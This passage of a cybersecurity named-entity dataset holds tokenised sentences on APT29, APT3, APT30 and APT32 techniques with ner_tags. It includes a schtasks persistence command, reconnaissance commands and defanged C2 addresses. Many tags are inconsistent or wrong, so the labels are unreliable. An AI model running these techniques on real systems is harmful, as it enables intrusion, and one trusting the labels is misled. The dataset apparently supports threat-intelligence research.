- "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "installed", - "web", - "shells", - "on", - "exploited", - "Microsoft", - "Exchange", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "used", - "WMI", - "to", - "steal", - "credentials", - "and", - "execute", - "backdoors", - "at", - "a", - "future", - "time." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT29", - "has", - "used", - "WMI", - "event", - "subscriptions", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "replaces", - "the", - "Sticky", - "Keys", - "binary", - "<code>C:\\Windows\\System32\\sethc.exe</code>", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "add", - "created", - "accounts", - "to", - "local", - "admin", - "groups", - "to", - "maintain", - "elevated", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "B-Org", - "I-Org", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "used", - "tools", - "to", - "compress", - "data", - "before", - "exfilling", - "it." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "locate", - "credentials", - "in", - "files", - "on", - "the", - "file", - "system", - "such", - "as", - "those", - "from", - "Firefox", - "or", - "Chrome." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "used", - "tools", - "to", - "dump", - "passwords", - "from", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "side", - "load", - "DLLs", - "with", - "a", - "valid", - "version", - "of", - "Chrome", - "with", - "one", - "of", - "their", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "will", - "identify", - "Microsoft", - "Office", - "documents", - "on", - "the", - "victim's", - "computer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "leverages", - "valid", - "accounts", - "after", - "gaining", - "credentials", - "for", - "use", - "within", - "the", - "victim", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "exfiltrates", - "data", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "exploited", - "the", - "Adobe", - "Flash", - "Player", - "vulnerability", - "CVE-2015-3113", - "and", - "Internet", - "Explorer", - "vulnerability", - "CVE-2014-1776." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "O", - "O", - "I-Exp", - "I-Exp", - "B-Features" - ] - }, - { - "tokens": [ - "An", - "APT3", - "downloader", - "establishes", - "SOCKS5", - "connections", - "for", - "its", - "initial", - "C2." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "delete", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "looks", - "for", - "files", - "and", - "directories", - "on", - "the", - "local", - "file", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "use", - "<code>-WindowStyle", - "Hidden</code>", - "to", - "conceal", - "PowerShell", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "remove", - "indicators", - "of", - "compromise", - "from", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "copy", - "files", - "to", - "remote", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "used", - "a", - "keylogging", - "tool", - "that", - "records", - "keystrokes", - "in", - "encrypted", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "used", - "a", - "tool", - "to", - "dump", - "credentials", - "by", - "injecting", - "itself", - "into", - "lsass.exe", - "and", - "triggering", - "with", - "the", - "argument", - "\"dig.\"" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "used", - "a", - "tool", - "that", - "can", - "obtain", - "info", - "about", - "local", - "and", - "global", - "group", - "users,", - "power", - "users,", - "and", - "administrators." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "create", - "or", - "enable", - "accounts,", - "such", - "as", - "<code>support_388945a0</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "stage", - "files", - "for", - "exfiltration", - "in", - "a", - "single", - "location." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-OffAct", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "lured", - "victims", - "into", - "clicking", - "malicious", - "links", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "An", - "APT3", - "downloader", - "first", - "establishes", - "a", - "SOCKS5", - "connection", - "to", - "192.157.198[.]103", - "using", - "TCP", - "port", - "1913;", - "once", - "the", - "server", - "response", - "is", - "verified,", - "it", - "then", - "requests", - "a", - "connection", - "to", - "192.184.60[.]229", - "on", - "TCP", - "port", - "81." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT3", - "downloader", - "establishes", - "SOCKS5", - "connections", - "for", - "its", - "initial", - "C2." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "obfuscates", - "files", - "or", - "information", - "to", - "help", - "evade", - "defensive", - "measures." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "brute", - "force", - "password", - "hashes", - "to", - "be", - "able", - "to", - "leverage", - "plain", - "text", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "enumerate", - "the", - "permissions", - "associated", - "with", - "Windows", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "used", - "PowerShell", - "on", - "victim", - "systems", - "to", - "download", - "and", - "run", - "payloads", - "after", - "exploitation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "list", - "out", - "currently", - "running", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "places", - "scripts", - "in", - "the", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "enables", - "the", - "Remote", - "Desktop", - "Protocol", - "for", - "persistence.", - "APT3", - "has", - "also", - "interacted", - "with", - "compromised", - "systems", - "to", - "browse", - "and", - "copy", - "files", - "through", - "RDP", - "sessions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "detect", - "the", - "existence", - "of", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "run", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT3", - "will", - "copy", - "files", - "over", - "to", - "Windows", - "Admin", - "Shares", - "(like", - "ADMIN$)", - "as", - "part", - "of", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT3", - "downloader", - "creates", - "persistence", - "by", - "creating", - "the", - "following", - "scheduled", - "task:", - "<code>schtasks", - "/create", - "/tn", - "\"mysc\"", - "/tr", - "C:\\Users\\Public\\test.exe", - "/sc", - "ONLOGON", - "/ru", - "\"System\"</code>." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "been", - "known", - "to", - "pack", - "their", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "obtain", - "information", - "about", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "keylogging", - "tool", - "used", - "by", - "APT3", - "gathers", - "network", - "information", - "from", - "the", - "victim,", - "including", - "the", - "MAC", - "address,", - "IP", - "address,", - "WINS,", - "DHCP", - "server,", - "and", - "gateway." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "can", - "enumerate", - "current", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT3", - "downloader", - "uses", - "the", - "Windows", - "command", - "<code>\"cmd.exe\"", - "/C", - "whoami</code>", - "to", - "verify", - "that", - "it", - "is", - "running", - "with", - "the", - "elevated", - "privileges", - "of", - "“System.”" - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT3", - "downloader", - "uses", - "the", - "Windows", - "command", - "<code>\"cmd.exe\"", - "/C", - "whoami</code>.", - "The", - "group", - "also", - "uses", - "a", - "tool", - "to", - "execute", - "commands", - "on", - "remote", - "computers." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT3", - "has", - "a", - "tool", - "that", - "creates", - "a", - "new", - "service", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT30", - "has", - "relied", - "on", - "users", - "to", - "execute", - "malicious", - "file", - "attachments", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT30", - "has", - "used", - "spearphishing", - "emails", - "with", - "malicious", - "DOC", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "has", - "used", - "LZMA", - "compression", - "and", - "RC4", - "encryption", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "includes", - "garbage", - "code", - "to", - "mislead", - "anti-malware", - "software", - "and", - "researchers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "cleared", - "select", - "event", - "log", - "entries." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "the", - "`Invoke-Obfuscation`", - "framework", - "to", - "obfuscate", - "their", - "PowerShell." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "COM", - "scriptlets", - "to", - "download", - "Cobalt", - "Strike", - "beacons." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "Outlook", - "Credential", - "Dumper", - "to", - "harvest", - "credentials", - "stored", - "in", - "Windows", - "registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "ran", - "legitimately-signed", - "executables", - "from", - "Symantec", - "and", - "McAfee", - "which", - "load", - "a", - "malicious", - "DLL.", - "The", - "group", - "also", - "side-loads", - "its", - "backdoor", - "by", - "dropping", - "a", - "library", - "and", - "a", - "legitimate,", - "signed", - "executable", - "(AcroTranscoder)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "set", - "up", - "and", - "operated", - "websites", - "to", - "gather", - "information", - "and", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "APT32", - "has", - "infected", - "victims", - "by", - "tricking", - "them", - "into", - "visiting", - "compromised", - "watering", - "hole", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "stood", - "up", - "websites", - "containing", - "numerous", - "articles", - "and", - "content", - "scraped", - "from", - "the", - "Internet", - "to", - "make", - "them", - "appear", - "legitimate,", - "but", - "some", - "of", - "these", - "pages", - "include", - "malicious", - "JavaScript", - "to", - "profile", - "the", - "potential", - "victim", - "or", - "infect", - "them", - "via", - "a", - "fake", - "software", - "update." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "collected", - "e-mail", - "addresses", - "for", - "activists", - "and", - "bloggers", - "in", - "order", - "to", - "target", - "them", - "with", - "spyware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Org", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "performed", - "code", - "obfuscation,", - "including", - "encoding", - "payloads", - "using", - "Base64", - "and", - "using", - "a", - "framework", - "called", - "\"Dont-Kill-My-Cat", - "(DKMC).", - "APT32", - "also", - "encrypts", - "the", - "library", - "used", - "for", - "network", - "exfiltration", - "with", - "AES-256", - "in", - "CBC", - "mode", - "in", - "their", - "macOS", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "has", - "exfiltrated", - "data", - "using", - "the", - "already", - "opened", - "channel", - "with", - "its", - "C&C", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "can", - "exfiltrate", - "data", - "by", - "encoding", - "it", - "in", - "the", - "subdomain", - "field", - "of", - "DNS", - "packets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "RTF", - "document", - "that", - "includes", - "an", - "exploit", - "to", - "execute", - "malicious", - "code.", - "(CVE-2017-11882)" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "CVE-2016-7255", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "macOS", - "backdoor", - "can", - "receive", - "a", - "“delete”", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "possesses", - "the", - "capability", - "to", - "list", - "files", - "and", - "directories", - "on", - "a", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "has", - "stored", - "its", - "configuration", - "in", - "a", - "registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "conducted", - "targeted", - "surveillance", - "against", - "activists", - "and", - "bloggers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-OffAct", - "O", - "O", - "B-Org", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "APT32's", - "macOS", - "backdoor", - "hides", - "the", - "clientID", - "file", - "via", - "a", - "chflags", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "the", - "WindowStyle", - "parameter", - "to", - "conceal", - "PowerShell", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "added", - "JavaScript", - "to", - "victim", - "websites", - "to", - "download", - "additional", - "frameworks", - "that", - "profile", - "and", - "compromise", - "website", - "visitors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "JavaScript", - "for", - "drive-by", - "downloads", - "and", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "abused", - "the", - "PasswordChangeNotify", - "to", - "monitor", - "for", - "and", - "capture", - "account", - "password", - "changes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "Mimikatz", - "and", - "customized", - "versions", - "of", - "Windows", - "Credential", - "Dumper", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "deployed", - "tools", - "after", - "moving", - "laterally", - "using", - "administrative", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT32's", - "macOS", - "backdoor", - "changes", - "the", - "permission", - "of", - "the", - "file", - "it", - "wants", - "to", - "execute", - "to", - "755." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "enumerated", - "administrative", - "users", - "using", - "the", - "commands", - "<code>net", - "localgroup", - "administrators</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "legitimate", - "local", - "admin", - "account", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "email", - "for", - "C2", - "via", - "an", - "Office", - "macro." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "attempted", - "to", - "lure", - "users", - "to", - "execute", - "a", - "malicious", - "dropper", - "delivered", - "via", - "a", - "spearphishing", - "attachment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "lured", - "targets", - "to", - "download", - "a", - "Cobalt", - "Strike", - "beacon", - "by", - "including", - "a", - "malicious", - "link", - "within", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "hidden", - "or", - "non-printing", - "characters", - "to", - "help", - "masquerade", - "service", - "names,", - "such", - "as", - "appending", - "a", - "Unicode", - "no-break", - "space", - "character", - "to", - "a", - "legitimate", - "service", - "name.", - "APT32", - "has", - "also", - "impersonated", - "the", - "legitimate", - "Flash", - "installer", - "file", - "name", - "\"install_flashplayer.exe\"." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Exp", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "APT32", - "has", - "disguised", - "a", - "Cobalt", - "Strike", - "beacon", - "as", - "a", - "Flash", - "Installer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "I-Exp", - "B-Exp" - ] - }, - { - "tokens": [ - "APT32", - "has", - "renamed", - "a", - "NetCat", - "binary", - "to", - "kb-10233.exe", - "to", - "masquerade", - "as", - "a", - "Windows", - "update.", - "APT32", - "has", - "also", - "renamed", - "a", - "Cobalt", - "Strike", - "beacon", - "payload", - "to", - "install_flashplayers.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "APT32's", - "backdoor", - "has", - "modified", - "the", - "Windows", - "Registry", - "to", - "store", - "the", - "backdoor's", - "configuration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "has", - "used", - "mshta.exe", - "for", - "code", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "NTFS", - "alternate", - "data", - "streams", - "to", - "hide", - "their", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "performed", - "network", - "scanning", - "on", - "the", - "network", - "to", - "search", - "for", - "open", - "ports,", - "services,", - "OS", - "finger-printing,", - "and", - "other", - "vulnerabilities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT32", - "used", - "the", - "<code>net", - "view</code>", - "command", - "to", - "show", - "all", - "shares", - "available,", - "including", - "the", - "administrative", - "shares", - "such", - "as", - "<code>C$</code>", - "and", - "<code>ADMIN$</code>." - ], - "ner_tags": [ - "B-Idus", 